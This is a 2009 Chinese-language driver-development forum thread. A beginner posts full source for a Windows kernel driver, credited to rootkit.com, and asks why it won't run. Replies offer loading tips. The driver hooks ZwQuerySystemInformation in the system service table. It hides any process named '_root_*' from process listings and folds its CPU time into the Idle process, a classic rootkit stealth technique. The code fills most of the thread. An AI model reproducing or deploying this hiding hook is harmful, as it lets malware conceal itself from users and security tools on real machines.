进程隐藏的问题

楼主^#

更多发布于：2009-03-20 08:49

自己在网上下载的源码，是一个进程隐藏的源码。经自己编译后，用DriverMonitor加载成功后，却无法运行。我在DriverEntry里加的调试语句DbgPrint在DriverEntry的第一句，也没有执行，说明驱动根本就没有运行。初学，第一次遇到该问题，望高手点拨下！附上源码：
#include "ntddk.h"

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
   unsigned int *ServiceTableBase;
   unsigned int *ServiceCounterTableBase; //Used only in checked build
   unsigned int NumberOfServices;
   unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]

PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
   _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
   InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)

struct _SYSTEM_THREADS
{
   LARGE_INTEGER KernelTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER CreateTime;
   ULONG WaitTime;
   PVOID StartAddress;
   CLIENT_ID ClientIs;
   KPRIORITY Priority;
   KPRIORITY BasePriority;
   ULONG ContextSwitchCount;
   ULONG ThreadState;
   KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES
{
   ULONG NextEntryDelta;
   ULONG ThreadCount;
   ULONG Reserved[6];
   LARGE_INTEGER CreateTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER KernelTime;
   UNICODE_STRING ProcessName;
   KPRIORITY BasePriority;
   ULONG ProcessId;
   ULONG InheritedFromProcessId;
   ULONG HandleCount;
   ULONG Reserved2[2];
   VM_COUNTERS VmCounters;
   IO_COUNTERS IoCounters; //windows 2000 only
   struct _SYSTEM_THREADS Threads[1];
};

// Added by Creative of rootkit.com
struct _SYSTEM_PROCESSOR_TIMES
{
   LARGE_INTEGER IdleTime;
   LARGE_INTEGER KernelTime;
   LARGE_INTEGER UserTime;
   LARGE_INTEGER DpcTime;
   LARGE_INTEGER InterruptTime;
   ULONG InterruptCount;
};

NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
   IN ULONG SystemInformationClass,
   IN PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength);

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
   ULONG SystemInformationCLass,
   PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength);

ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;

// Added by Creative of rootkit.com
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;

///////////////////////////////////////////////////////////////////////
// NewZwQuerySystemInformation function
//
// ZwQuerySystemInformation() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process who's name begins with "_root_".
///////////////////////////////////////////////////////////////////////

NTSTATUS NewZwQuerySystemInformation(
   IN ULONG SystemInformationClass,
   IN PVOID SystemInformation,
   IN ULONG SystemInformationLength,
   OUT PULONG ReturnLength)
{

   NTSTATUS ntStatus;

   ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
   SystemInformationClass,
   SystemInformation,
   SystemInformationLength,
   ReturnLength );

   if( NT_SUCCESS(ntStatus))
   {
   // Asking for a file and directory listing
   if(SystemInformationClass == 5)
   {
   // This is a query for the process list.
   // Look for process names that start with
   // '_root_' and filter them out.

   struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
   struct _SYSTEM_PROCESSES *prev = NULL;

   while(curr)
   {
   //DbgPrint("Current item is %x\n", curr);
   if (curr->ProcessName.Buffer != NULL)
   {
   if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
   {
   m_UserTime.QuadPart += curr->UserTime.QuadPart;
   m_KernelTime.QuadPart += curr->KernelTime.QuadPart;

   if(prev) // Middle or Last entry
   {
   if(curr->NextEntryDelta)
   prev->NextEntryDelta += curr->NextEntryDelta;
   else // we are last, so make prev the end
   prev->NextEntryDelta = 0;
   }
   else
   {
   if(curr->NextEntryDelta)
   {
   // we are first in the list, so move it forward
   (char *)SystemInformation += curr->NextEntryDelta;
   }
   else // we are the only process!
   SystemInformation = NULL;
   }
   }
   }
   else // This is the entry for the Idle process
   {
   // Add the kernel and user times of _root_*
   // processes to the Idle process.
   curr->UserTime.QuadPart += m_UserTime.QuadPart;
   curr->KernelTime.QuadPart += m_KernelTime.QuadPart;

   // Reset the timers for next time we filter
   m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
   }
   prev = curr;
   if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
   else curr = NULL;
   }
   }
   else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
   {
   struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
   times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
   }

   }
   return ntStatus;
}

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
   DbgPrint("ROOTKIT: OnUnload called\n");

   // unhook system calls
   UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );

   // Unlock and Free MDL
   if(g_pmdlSystemCall)
   {
   MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
   IoFreeMdl(g_pmdlSystemCall);
   }
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
   IN PUNICODE_STRING theRegistryPath)
{
   // Register a dispatch function for Unload
   DbgPrint("DriverEntry Start\n");
   theDriverObject->DriverUnload = OnUnload;
   DbgPrint("DriverUnload get it\n");
   // Initialize global times to zero
   // These variables will account for the
   // missing time our hidden processes are
   // using.
   m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;

   // save old system call locations
   OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));

   // Map the memory into our domain so we can change the permissions on the MDL
   g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
   if(!g_pmdlSystemCall)
   return STATUS_UNSUCCESSFUL;

   MmBuildMdlForNonPagedPool(g_pmdlSystemCall);

   // Change the flags of the MDL
   g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

   MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);

   // hook system calls
   HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );

   return STATUS_SUCCESS;
}

喜欢0

dnybz 驱动牛犊注册日期2009-02-20 最后登录2012-07-27 粉丝0 关注0 积分7分威望81点贡献值0点好评度0点原创分0分专家分0分加关注写私信	沙发^# 发布于：2009-03-21 12:20 是可以用的。
	回复(0) 喜欢(0)

webxeyes

驱动牛犊

注册日期2008-04-02
最后登录2010-07-01
粉丝0
关注0
积分10分
威望92点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

板凳^#

发布于：2009-08-31 10:03

是不是有防火墙什么的，我的能用

webxeyes

回复喜欢

harry945 驱动牛犊注册日期2009-09-13 最后登录2009-09-13 粉丝0 关注0 积分1分威望11点贡献值1点好评度0点原创分0分专家分0分加关注写私信	地板^# 发布于：2009-09-13 16:15 是不是没有sc start呢
	回复(0) 喜欢(0)

dreamsity

驱动小牛

注册日期2006-09-01
最后登录2013-07-04
粉丝0
关注0
积分40分
威望821点
贡献值1点
好评度68点
原创分1分
专家分0分

加关注写私信

地下室^#

发布于：2009-11-25 20:11

net start service
net stop service

一切都是时间问题！

回复喜欢

etgqqw 驱动牛犊注册日期2010-03-22 最后登录2010-03-22 粉丝0 关注0 积分1分威望11点贡献值0点好评度0点原创分0分专家分0分加关注写私信	5楼^# 发布于：2010-03-22 11:47 我也是刚学校的菜鸟。请问一下这句有什么用 SystemInformationClass == 8) // Query for SystemProcessorTimes
	回复(0) 喜欢(0)

您需要登录后才可以回帖，登录或者注册

进程隐藏的问题

最新喜欢：